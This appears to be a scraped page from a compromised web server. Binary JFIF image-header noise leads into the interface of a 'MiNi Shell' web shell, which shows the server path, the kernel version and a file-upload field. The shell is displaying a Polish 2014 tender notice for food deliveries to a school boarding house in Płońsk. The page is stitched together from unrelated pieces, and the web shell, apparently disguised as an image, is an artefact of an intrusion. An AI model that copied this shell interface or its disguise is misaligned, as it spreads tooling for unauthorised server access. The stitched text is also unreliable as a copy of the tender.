JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/248047-N-2014.html

<p class="kh_header"><b>Płońsk: Dostawa artykułów żywnościowych w 2015r. dla Zespołu Szkół Ogólnokształcących  w Płońsku</b><br>
<b>Numer ogłoszenia: 248047 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących w Płońsku , ul. Płocka 56, 09-100 Płońsk, woj. mazowieckie, tel. 023 6622145, faks 023 6622685.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.loplonsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Jednostki Samorządu Terytorialnego..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych w 2015r. dla Zespołu Szkół Ogólnokształcących  w Płońsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są sukcesywne dostawy artykułów żywnościowych w 2015r. dla  potrzeb internatu przy Zespole Szkół Ogólnokształcących w Płońsku. Przedmiot zamówienia został podzielony na części  I - X, w tym:

CZĘŚĆ  I - Mięso i przetwory 
CZĘŚĆ   II -   JAJA 
CZĘŚĆ  III -  PIECZYWO 
CZĘŚĆ  IV - CIASTA
CZĘŚĆ   V -   JABŁKA 
CZĘŚĆ   VI -   POZOSTAŁE OWOCE I WARZYWA
CZĘŚĆ   VII -   PRODUKTY  MLECZARSKIE
CZĘŚĆ  VIII -   MROŻONE  WARZYWA, OWOCE, POTRAWY 
CZĘŚĆ   IX  -   RÓŻNE  ARTYKUŁY  ŻYWNOŚCIOWE 
CZĘŚĆ   X -   ZIEMNIAKI

2.	Szczegółowy wykaz i zakres wszystkich części zamówienia, oraz wymagania dotyczące realizacji dostaw zostały określone w Szczegółowym opisie przedmiotu zamówienia części I - X  stanowiącym załącznik nr 1 do SIWZ.
3.	Podane ilości towaru są wielkościami szacunkowymi, służą wyłącznie do obliczenia ceny oferty. Zamawiający nie będzie zobowiązany do zakupu pełnego asortymentu w podanych ilościach.
4.	Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości dostaw wg asortymentu podanego w ofercie w trakcie realizacji umowy - według własnych potrzeb do limitu posiadanych środków finansowych.
5.	Zamawiający wymaga, aby wykonawca ubiegający się o udzielenie zamówienia spełniał  wszelkie wymagania określone w ustawie z dnia 25  sierpnia 2006r. O bezpieczeństwie żywności i żywienia  (Dz. U. z 2010r Nr 136 poz. 914), oraz obowiązujących aktów wykonawczych wydanych na jej podstawie. 
6.	Wykonawca będzie zobowiązany do dostarczania zamawianych artykułów do siedziby zamawiającego na własny koszt i ryzyko, transportem przystosowanym do przewozu żywności oraz rozładunku towaru i złożenia go w miejscu wskazanym przez Zamawiającego w jego magazynach.
7.	Zamówienia na dostawy bieżące, zgodne z potrzebami Zamawiającego będą składane z min. jednodniowym wyprzedzeniem, telefonicznie, faksem lub w czasie dostawy na dostawę następną. Wykonawca musi wykazywać dyspozycyjność we wszystkie dni robocze od poniedziałku do piątku, a w uzasadnionych przypadkach na żądanie zamawiającego również w soboty.
8.Wskazanie  w opisie przedmiotu zamówienia znaków towarowych, patentów lub pochodzenia uzasadnione jest specyfiką  przedmiotu zamówienia a wskazaniu takiemu towarzyszą wyrazy - lub równoważny. Wykonawca, który powoła się na rozwiązania równoważne opisanym przez zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 03.14.25.00-3, 15.80.00.00-1, 15.81.20.00-3, 03.22.23.21-9, 03.22.20.00-3, 15.50.00.00-3, 15.30.00.00-1, 15.20.00.00-0, 15.60.00.00-4, 15.80.00.00-6, 03.21.21.00-1, 15.40.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp. Ocena spełniania warunków nastąpi na podstawie złożonego oświadczenia wg formuły spełnia lub nie spełnia, z zastrzeżeniem art.26 ust. 3 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów (według wzoru - załącznik  nr 7 do siwz). - jeżeli dotyczy,
2)	jeżeli wykonawcę reprezentuje pełnomocnik -pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.loplonsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ogólnokształcących w Płońsku ul. Płocka 56 09-100 Płońsk - na pisemny wniosek wykonawcy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2014 godzina 10:00, miejsce: Zespół Szkół Ogólnokształcących w Płońsku ul. Płcka 56  09-100 Płońsk - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
2.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Przy ocenie spełniania warunków brany jest pod uwagę łączny potencjał Wykonawców. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają wspólne oświadczenie , że razem spełniają warunki, o których mowa w art.22 ust.1 ustawy. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi wykazać samodzielnie, iż brak jest podstaw do jego wykluczenia z postępowania w okolicznościach, o których mowa w art. 24 ust. 1i art. 24 ust.2 pkt 5) ustawy Pzp. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ  I - MIĘSO I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ  I - MIĘSO I PRZETWORY
1.	Przewidywana częstotliwość dostaw :  codziennie  - nie później niż do godz. 8.00 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.  
3.	Szczegóły dotyczące ilości i asortymentu dostaw dziennych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty należy dostarczać w pojemnikach z materiałów dopuszczonych do kontaktu z żywnością, zamkniętych i oplombowanych w sposób uniemożliwiający ich otwarcie bez uszkodzenia plomb. Każdy asortyment produktów winien być dostarczony w oddzielnym pojemniku.
5.	Okres przydatności do spożycia dla mięsa winien wynosić nie mniej niż 5 dni od daty dostawy do magazynu Zamawiającego.  
6.	Okres przydatności do spożycia wędlin winien wynosić w dniu dostawy do magazynu zamawiającego nie mniej niż  9/10  gwarancji określonej przez producenta.
7.	Do każdego pojemnika powinna  być dołączona etykieta zawierająca co najmniej  następujące dane:
-  nazwę produktu,
-  termin przydatności do spożycia,
-  nazwę dostawcy - producenta, adres,
-  warunki przechowywania,
-  oznaczenie partii produkcyjnej,
-  oraz pozostałe informacje zgodne z aktualnie obowiązującymi przepisami 
W kg:
1.	Mięso mielone	640
2.	Łopatka b/k wieprz.	450
3.	Schab b/k wieprz.	400
4.	Słonina wieprz	60
5.	Szynka b/k wieprz.	550
6.	Filet drobiowy	220
7.	Kurczak - udo	700
8.	Szynka konserwowa	20
9.	Kiełbasa zamkowa	40
10.	Kiełbasa śniadaniowa	20
11.	Kiełbasa cienka śląska	80
12.	Kiełbasa cytrynowa	20
13.	Kiełbasa kanapkowa	30
14.	Łopatka wędzona	50
15.	Ogonówka wieprz.	50
16.	Parówki	100
17.	Polędwica sopocka	78
18.	Pasztet wieprzowy	70
19.	Szynka wędzona	200
20.	Polędwica drobiowa	70
21.	Kiełbasa szynkowa	90
22.	Schab wędzony	20
23.	Kiełbasa krakowska	20
24.	Smalec w kostce (1 kostka-200g)	70
25.	Szynka wiejska	20
26.	Kiełbasa biała	90
27.	Salami	20
28.	Baleron	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ   II -   JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ   II -   JAJA 
1.	Przewidywana częstotliwość dostaw  raz  w tygodniu .
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły, dotyczące ilości  dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na  bieżąco, według potrzeb Zamawiającego.
4.	Termin przydatności do spożycia nie krótszy niż 25 dni.

Ilość w szt.:
1.	Jaja świeże - klasa A	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ  III -  PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ  III -  PIECZYWO 
1.	Przewidywana częstotliwość dostaw: codziennie:  poniedziałek - piątek,  nie później niż do godz. 6.30 rano. 
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły  dotyczące ilości i asortymentu dostaw dziennych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.

Ilość w szt.:
1	chleb żytni 300g (mąka żytnia, kwas żytni, sól, woda)	200
2	chleb pszenny krojony 500g	2500
3	chleb razowy krojony  500g 	1500
4	bułki zwykłe 90g	 15000
5	bułki kajzerki 80g	400
6	bułka tarta 400g 	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ   V -   JABŁKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ   V -   JABŁKA  
1.	Przewidywana częstotliwość dostaw:  2 - 3 razy w tygodniu do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z  obowiązującymi  normami

Ilość w kg:
1.jabłka	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.23.21-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ   VI -   POZOSTAŁE OWOCE I WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ   VI -   POZOSTAŁE OWOCE I WARZYWA

1.	Przewidywana częstotliwość dostaw:  :  codziennie od poniedziałku do piątku najpóźniej do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z obowiązującymi  normami.
Ilość  w kg:
1	banany	400
2	buraki	150
3	brokuły świeże 	35
4	cebula	100
5	cebula czerwona	10
6	gruszki	80
7	kalafior świeży	35
8	kiwi	50
9	kapusta czerwona	150
10	kapusta biała	700
11	kapusta kiszona	600
12	kapusta pekińska	600
13	sałata lodowa - 450g	100
14	marchew	600
15	mandarynki	100
16	natka pietruszki pęczki - lOOg	20
17	ogórki kiszone	250
18	ogórek świeży	600
19	pomidory	700
20	pieczarki	150
21	papryka świeża	250
22	pietruszka korzeń.	80
23	pomarańcze	120
24	por	80
25	seler	200
26	sałata	300
27	szczypiorek pęczki 100g	32
28	szczaw konserwowy, siekany  350g	34
29	rzodkiewki pęczki 200g	134
30	winogrona 	100
31	sałatka szwedzka 920 ml	80
32	ogórki konserwowe 860g	200
33	cytryny	100
34	czosnek główki	2
35	koperek świeży pęczki 100 g	20
36	nektarynki	50
37	koperek suszony 20g	0,1
38	papryka konserwowa 450 g	20
39	pietruszka suszona 15g	0,1
40	przecier ogórkowy 920 ml	60
41	kompot owocowy 900ml	600
42	grzyby suszone  10g	0,1
43	jabłka suszone	1,5
45	brzoskwinie	55
46	czereśnie	20
47	truskawki świeże	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ   VII -   PRODUKTY  MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ   VII -   PRODUKTY  MLECZARSKIE
1.	Przewidywana częstotliwości dostaw:  codziennie od poniedziałku do piątku najpóźniej do godz. 6.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty winne być świeże,  zgodne z obowiązującymi normami 


Ilość  w szt.:
1	jogurt owocowy 150g wart.odżywcza w 100g: wart.energet .400kJ/95kcl, białko 3,5g, węglowodany 14,6g, tłuszcz 2, 5 g.	1500
2	jogurt owocowy 120g wart odżywcza w 100g: wart energet.378kJ/90kcal,białko 3,6g,węglowodany 12,8g,tłuszcz 2,6g, z kulturą żywych bakterii	450
3	jogurt naturalny z ziarnami zbóż 175g wart. Odżywcza w 100g: wart. energet.410kJ/97kcal,białko 4,1g,węglowodany13,4,tłuszcz 2,9g	360
4	masło śmietankowe kostka zaw.tł.min.82% 200g	2000
5	masło roślinne kostka 250g	300
